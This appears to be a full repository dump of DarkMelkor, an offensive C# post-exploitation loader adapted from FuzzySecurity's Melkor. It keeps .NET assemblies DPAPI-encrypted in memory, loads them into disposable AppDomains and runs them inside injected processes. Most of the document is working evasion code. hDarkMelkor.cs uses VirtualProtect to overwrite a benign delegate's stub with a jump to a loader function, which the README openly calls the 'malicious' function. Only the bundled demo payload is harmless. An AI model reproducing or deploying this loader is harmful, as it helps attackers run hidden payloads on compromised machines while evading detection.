├── DarkMelkor ├── DarkMelkor │ ├── DarkMelkor.sln │ └── DarkMelkor │ │ ├── App.config │ │ ├── DarkMelkor.csproj │ │ ├── Program.cs │ │ ├── Properties │ │ └── AssemblyInfo.cs │ │ └── hDarkMelkor.cs └── demoModule │ ├── demoModule.sln │ └── demoModule │ ├── App.config │ ├── Program.cs │ ├── Properties │ └── AssemblyInfo.cs │ └── demoModule.csproj └── README.md /DarkMelkor/DarkMelkor/DarkMelkor.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.31229.75 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DarkMelkor", "DarkMelkor\DarkMelkor.csproj", "{ECF2FFE4-1744-4745-8693-5790D66BB1B8}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {ECF2FFE4-1744-4745-8693-5790D66BB1B8}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {ECF2FFE4-1744-4745-8693-5790D66BB1B8}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {ECF2FFE4-1744-4745-8693-5790D66BB1B8}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {ECF2FFE4-1744-4745-8693-5790D66BB1B8}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {6EF84481-D7BF-497F-B4C6-F691D7ED195A} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /DarkMelkor/DarkMelkor/DarkMelkor/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /DarkMelkor/DarkMelkor/DarkMelkor/DarkMelkor.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {ECF2FFE4-1744-4745-8693-5790D66BB1B8} 8 | Exe 9 | DarkMelkor 10 | DarkMelkor 11 | v4.0 12 | 512 13 | true 14 | 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | -------------------------------------------------------------------------------- /DarkMelkor/DarkMelkor/DarkMelkor/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.IO; 3 | 4 | namespace DarkMelkor 5 | { 6 | class Program 7 | { 8 | public static void runTest() 9 | { 10 | // Encrypt module 11 | //============== 12 | Console.WriteLine("[>] Reading assembly as Byte[]"); 13 | Byte[] bMod = File.ReadAllBytes(@"C:\Users\tmayllart\Downloads\DarkMelkor\demoModule\demoModule\bin\Debug\demoModule.exe");//change it wth the path of the compiled demoModule 14 | Console.WriteLine("[>] DPAPI CryptProtectData -> assembly[]"); 15 | DarkMelkor.DPAPI_MODULE dpMod = DarkMelkor.dpapiEncryptModule(bMod, "Melkor", 0); 16 | if (dpMod.pMod != IntPtr.Zero) 17 | { 18 | Console.WriteLine(" |_ Success"); 19 | Console.WriteLine(" |_ pCrypto : 0x" + String.Format("{0:X}", (dpMod.pMod).ToInt64())); 20 | Console.WriteLine(" |_ iSize : " + dpMod.iModSize); 21 | bMod = null; 22 | } else 23 | { 24 | Console.WriteLine("\n[!] Failed to DPAPI encrypt module.."); 25 | return; 26 | } 27 | 28 | Console.WriteLine("\n[?] Press enter to continue.."); 29 | 30 | // Create AppDomain & load module 31 | //============== 32 | Console.WriteLine("[>] DPAPI CryptUnprotectData -> assembly[] copy"); 33 | DarkMelkor.DPAPI_MODULE oMod = DarkMelkor.dpapiDecryptModule(dpMod); 34 | if (oMod.iModSize != 0) 35 | { 36 | Console.WriteLine(" |_ Success"); 37 | } else 38 | { 39 | Console.WriteLine("\n[!] Failed to DPAPI decrypt module.."); 40 | return; 41 | } 42 | Console.WriteLine("[>] Create new AppDomain and invoke module through proxy.."); 43 | AppDomain oAngband = null; 44 | try 45 | { 46 | oAngband = DarkMelkor.loadAppDomainModule("dothething", "Angband", oMod.bMod); 47 | } 48 | catch (Exception ex) 49 | { 50 | } 51 | 52 | Console.WriteLine("\n[?] Press enter to continue.."); 53 | 54 | // Remove Appdomain and free CryptUnprotectData 55 | //============== 56 | Console.WriteLine("[>] Unloading AppDomain"); 57 | DarkMelkor.unloadAppDomain(oAngband); 58 | Console.WriteLine("[>] Freeing CryptUnprotectData"); 59 | DarkMelkor.freeMod(oMod); 60 | 61 | Console.WriteLine("\n[?] Press enter to exit.."); 62 | } 63 | 64 | static void Main(string[] args) 65 | { 66 | runTest(); 67 | } 68 | } 69 | } 70 | -------------------------------------------------------------------------------- /DarkMelkor/DarkMelkor/DarkMelkor/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("Melkor")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("Melkor")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("ecf2ffe4-1744-4745-8693-5790d66bb1b8")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /DarkMelkor/DarkMelkor/DarkMelkor/hDarkMelkor.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.IO; 3 | using System.Reflection; 4 | using System.Runtime.CompilerServices; 5 | using System.Runtime.InteropServices; 6 | 7 | namespace DarkMelkor 8 | { 9 | class DarkMelkor 10 | { 11 | [DllImport("kernel32")] 12 | static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); 13 | 14 | // API 15 | //====================== 16 | [DllImport("ntdll.dll")] 17 | public static extern UInt32 NtFreeVirtualMemory( 18 | IntPtr ProcessHandle, 19 | ref IntPtr BaseAddress, 20 | ref IntPtr RegionSize, 21 | AllocationType FreeType); 22 | 23 | [DllImport("ntdll.dll")] 24 | public static extern void RtlZeroMemory( 25 | IntPtr Destination, 26 | int length); 27 | 28 | [DllImport("kernel32.dll")] 29 | public static extern IntPtr LocalFree( 30 | IntPtr hMem); 31 | 32 | [DllImport("crypt32.dll", CharSet = CharSet.Auto)] 33 | public static extern bool CryptProtectData( 34 | ref DATA_BLOB pPlainText, 35 | string szDescription, 36 | ref DATA_BLOB pEntropy, 37 | IntPtr pReserved, 38 | IntPtr pPrompt, 39 | int dwFlags, 40 | ref DATA_BLOB pCipherText); 41 | 42 | [DllImport("crypt32.dll", CharSet = CharSet.Auto)] 43 | public static extern bool CryptUnprotectData( 44 | ref DATA_BLOB pCipherText, 45 | ref string pszDescription, 46 | ref DATA_BLOB pEntropy, 47 | IntPtr pReserved, 48 | IntPtr pPrompt, 49 | int dwFlags, 50 | ref DATA_BLOB pPlainText); 51 | 52 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 53 | internal struct DATA_BLOB 54 | { 55 | public int cbData; 56 | public IntPtr pbData; 57 | } 58 | 59 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 60 | internal struct CRYPTPROTECT_PROMPTSTRUCT 61 | { 62 | public int cbSize; 63 | public int dwPromptFlags; 64 | public IntPtr hwndApp; 65 | public string szPrompt; 66 | } 67 | 68 | [StructLayout(LayoutKind.Sequential)] 69 | internal struct DPAPI_MODULE 70 | { 71 | public String sModName; 72 | public int iModVersion; 73 | public int iModSize; 74 | public IntPtr pMod; 75 | public Byte[] bMod; 76 | } 77 | 78 | [Flags] 79 | public enum AllocationType : uint 80 | { 81 | Commit = 0x1000, 82 | Reserve = 0x2000, 83 | Decommit = 0x4000, 84 | Release = 0x8000, 85 | Reset = 0x80000, 86 | Physical = 0x400000, 87 | TopDown = 0x100000, 88 | WriteWatch = 0x200000, 89 | ResetUndo = 0x1000000, 90 | LargePages = 0x20000000 91 | } 92 | 93 | // Globals 94 | //====================== 95 | public static Byte[] bEntropy = { 0x90, 0x91, 0x92, 0x93 }; // Add entropy to the crypto 96 | public static int CRYPTPROTECT_LOCAL_MACHINE = 0x4; 97 | public static Object CryptLock = new Object(); 98 | 99 | public static AppDomain loadAppDomainModule(String sMethod, String sAppDomain, Byte[] bMod) 100 | { 101 | var bytes = bMod; 102 | string pathToDll = Assembly.GetExecutingAssembly().CodeBase; 103 | AppDomainSetup domainSetup = new AppDomainSetup { PrivateBinPath = pathToDll }; 104 | AppDomain isolationDomain = AppDomain.CreateDomain(Guid.NewGuid().ToString()); 105 | isolationDomain.SetData("str", "[!] Before Loader"); 106 | Console.WriteLine(isolationDomain.GetData("str")); 107 | bool default_domain = AppDomain.CurrentDomain.IsDefaultAppDomain(); 108 | try 109 | { 110 | isolationDomain.Load(bMod); 111 | } 112 | catch{ } 113 | var Sleeve = new CrossAppDomainDelegate(Console.Beep); 114 | var Ace = new CrossAppDomainDelegate(ActivateLoader); 115 | 116 | RuntimeHelpers.PrepareDelegate(Sleeve); 117 | RuntimeHelpers.PrepareDelegate(Ace); 118 | 119 | var flags = BindingFlags.Instance | BindingFlags.NonPublic; 120 | var codeSleeve = (IntPtr)Sleeve.GetType().GetField("_methodPtrAux", flags).GetValue(Sleeve); 121 | var codeAce = (IntPtr)Ace.GetType().GetField("_methodPtrAux", flags).GetValue(Ace); 122 | 123 | int[] patch = new int[3]; 124 | 125 | 126 | //Uncomment this if you are compiling for .NET 4.5 127 | /* 128 | if (default_domain) 129 | { 130 | patch[0] = 8; 131 | patch[1] = 9; 132 | patch[2] = 10; 133 | } 134 | else 135 | {*/ 136 | patch[0] = 10; 137 | patch[1] = 11; 138 | patch[2] = 12; 139 | //} 140 | 141 | uint oldprotect = 0; 142 | VirtualProtect(codeSleeve, new UIntPtr((uint)patch[2]), 0x4, out oldprotect); 143 | Marshal.WriteByte(codeSleeve, 0x48); 144 | Marshal.WriteByte(IntPtr.Add(codeSleeve,1),0xb8); 145 | Marshal.WriteIntPtr(IntPtr.Add(codeSleeve, 2), codeAce); 146 | Marshal.WriteByte(IntPtr.Add(codeSleeve, patch[0]), 0xff); 147 | Marshal.WriteByte(IntPtr.Add(codeSleeve, patch[1]), 0xe0); 148 | VirtualProtect(codeSleeve, new UIntPtr((uint)patch[2]), oldprotect, out oldprotect); 149 | 150 | try 151 | { 152 | isolationDomain.DoCallBack(Sleeve); 153 | Console.WriteLine("[!] " + isolationDomain.GetData("str")); 154 | }catch(Exception ex) 155 | { } 156 | string str = isolationDomain.GetData("str") as string; 157 | return isolationDomain; 158 | } 159 | 160 | static void ActivateLoader() 161 | { 162 | string str = AppDomain.CurrentDomain.GetData("str") as string; 163 | string[] args = { str, "Loader Active" }; 164 | string output = ""; 165 | foreach (var asm in AppDomain.CurrentDomain.GetAssemblies()) 166 | { 167 | if (!asm.FullName.Contains("mscor")) 168 | { 169 | TextWriter realStdOut = Console.Out; 170 | TextWriter realStdErr = Console.Error; 171 | TextWriter stdOutWriter = new StringWriter(); 172 | TextWriter stdErrWriter = new StringWriter(); 173 | Console.SetOut(stdOutWriter); 174 | Console.SetError(stdErrWriter); 175 | var result = asm.EntryPoint.Invoke(null, new object[] { args }); 176 | 177 | Console.Out.Flush(); 178 | Console.Error.Flush(); 179 | Console.SetOut(realStdOut); 180 | Console.SetError(realStdErr); 181 | 182 | output = stdOutWriter.ToString(); 183 | output += stdErrWriter.ToString(); 184 | } 185 | } 186 | AppDomain.CurrentDomain.SetData("str",output); 187 | 188 | } 189 | 190 | public static void unloadAppDomain(AppDomain oDomain) 191 | { 192 | AppDomain.Unload(oDomain); 193 | } 194 | 195 | public static DATA_BLOB makeBlob(Byte[] bData) 196 | { 197 | DATA_BLOB oBlob = new DATA_BLOB(); 198 | 199 | oBlob.pbData = Marshal.AllocHGlobal(bData.Length); 200 | oBlob.cbData = bData.Length; 201 | RtlZeroMemory(oBlob.pbData, bData.Length); 202 | Marshal.Copy(bData, 0, oBlob.pbData, bData.Length); 203 | 204 | return oBlob; 205 | } 206 | 207 | public static void freeMod(DPAPI_MODULE oMod) 208 | { 209 | //IntPtr piLen = (IntPtr)oMod.iModSize; 210 | //NtFreeVirtualMemory((IntPtr)(-1), ref oMod.pMod, ref piLen, AllocationType.Release); 211 | LocalFree(oMod.pMod); 212 | } 213 | 214 | public static DPAPI_MODULE dpapiEncryptModule(Byte[] bMod, String sModName, Int32 iModVersion = 0) 215 | { 216 | DPAPI_MODULE dpMod = new DPAPI_MODULE(); 217 | 218 | DATA_BLOB oPlainText = makeBlob(bMod); 219 | DATA_BLOB oCipherText = new DATA_BLOB(); 220 | DATA_BLOB oEntropy = makeBlob(bEntropy); 221 | 222 | Boolean bStatus = CryptProtectData(ref oPlainText, sModName, ref oEntropy, IntPtr.Zero, IntPtr.Zero, CRYPTPROTECT_LOCAL_MACHINE, ref oCipherText); 223 | if (bStatus) 224 | { 225 | dpMod.sModName = sModName; 226 | dpMod.iModVersion = iModVersion; 227 | dpMod.iModSize = oCipherText.cbData; 228 | dpMod.pMod = oCipherText.pbData; 229 | } 230 | 231 | return dpMod; 232 | } 233 | 234 | public static DPAPI_MODULE dpapiDecryptModule(DPAPI_MODULE oEncMod) 235 | { 236 | DPAPI_MODULE oMod = new DPAPI_MODULE(); 237 | 238 | Byte[] bEncrypted = new Byte[oEncMod.iModSize]; 239 | Marshal.Copy(oEncMod.pMod, bEncrypted, 0, oEncMod.iModSize); 240 | 241 | DATA_BLOB oPlainText = new DATA_BLOB(); 242 | DATA_BLOB oCipherText = makeBlob(bEncrypted); 243 | DATA_BLOB oEntropy = makeBlob(bEntropy); 244 | 245 | String sDescription = String.Empty; 246 | Boolean bStatus = CryptUnprotectData(ref oCipherText, ref sDescription, ref oEntropy, IntPtr.Zero, IntPtr.Zero, 0, ref oPlainText); 247 | if (bStatus) 248 | { 249 | oMod.pMod = oPlainText.pbData; 250 | oMod.bMod = new Byte[oPlainText.cbData]; 251 | Marshal.Copy(oPlainText.pbData, oMod.bMod, 0, oPlainText.cbData); 252 | oMod.iModSize = oPlainText.cbData; 253 | oMod.iModVersion = oEncMod.iModVersion; 254 | } 255 | 256 | return oMod; 257 | } 258 | } 259 | } 260 | -------------------------------------------------------------------------------- /DarkMelkor/demoModule/demoModule.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.31229.75 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "demoModule", "demoModule\demoModule.csproj", "{0A621F4C-8082-4C30-B131-BA2C98DB0533}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {0A621F4C-8082-4C30-B131-BA2C98DB0533}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {0A621F4C-8082-4C30-B131-BA2C98DB0533}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {0A621F4C-8082-4C30-B131-BA2C98DB0533}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {0A621F4C-8082-4C30-B131-BA2C98DB0533}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {63EC8396-3687-44B2-9719-4C1CCBF3DD95} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /DarkMelkor/demoModule/demoModule/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /DarkMelkor/demoModule/demoModule/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | using System.Windows.Forms; 7 | using System.IO; 8 | 9 | namespace demoModule 10 | { 11 | class Program 12 | { 13 | public static void doTheThing(string[] args) 14 | { 15 | Console.WriteLine("After Loader"); 16 | } 17 | 18 | static void Main(string[] args) 19 | { 20 | doTheThing(args); 21 | } 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /DarkMelkor/demoModule/demoModule/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("demoModule")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("demoModule")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("0a621f4c-8082-4c30-b131-ba2c98db0533")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /DarkMelkor/demoModule/demoModule/demoModule.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {0A621F4C-8082-4C30-B131-BA2C98DB0533} 8 | Exe 9 | demoModule 10 | demoModule 11 | v4.5 12 | 512 13 | true 14 | 15 | 16 | AnyCPU 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | AnyCPU 27 | pdbonly 28 | true 29 | bin\Release\ 30 | TRACE 31 | prompt 32 | 4 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # DarkMelkor 2 | 3 | DarkMelkor is a modified version of Melkor, from @b33f (FuzzySecurity): https://github.com/FuzzySecurity/Sharp-Suite. 4 | Melkor was originally released as a tool able to load .NET assemblies in disposable AppDomains, keeping them encrypted in memory while they are not being invoked. 5 | This came up as an alternative to fork&run tasks since it would be possible to load, invoke and discard the AppDomains in the same process, instead of loading the CLR in a sacrificial process and waiting for it to finish execution. 6 | Unfortunately, the original project was not able to reference the loaded assembly in the disposable AppDomain in case you are loading it in a injected process, due to calling it from a “no context” assembly. 7 | 8 | While searching for an alternative to the mentioned problem, this article: https://www.accenture.com/us-en/blogs/cyber-defense/clrvoyance-loading-managed-code-into-unmanaged-processes from Bryan Alexander and Josh Stone came up with an interesting solution. It is possible to create two CrossAppDomainDelegates: one of them referencing a function that can be resolved by our "no context" assembly (basically anything in the mscorlib) and the other being our malicious function. After that we can patch the initial bytes of the first function with the adress of the malicious one, in a way that when calling the non-malicious one, it will endup jumping to the address of the second function. 9 | 10 | Credit goes to these folks: @b33f, Bryan Alexander and Josh Stone. I've just assembled these ideas with small modifications. 11 | --------------------------------------------------------------------------------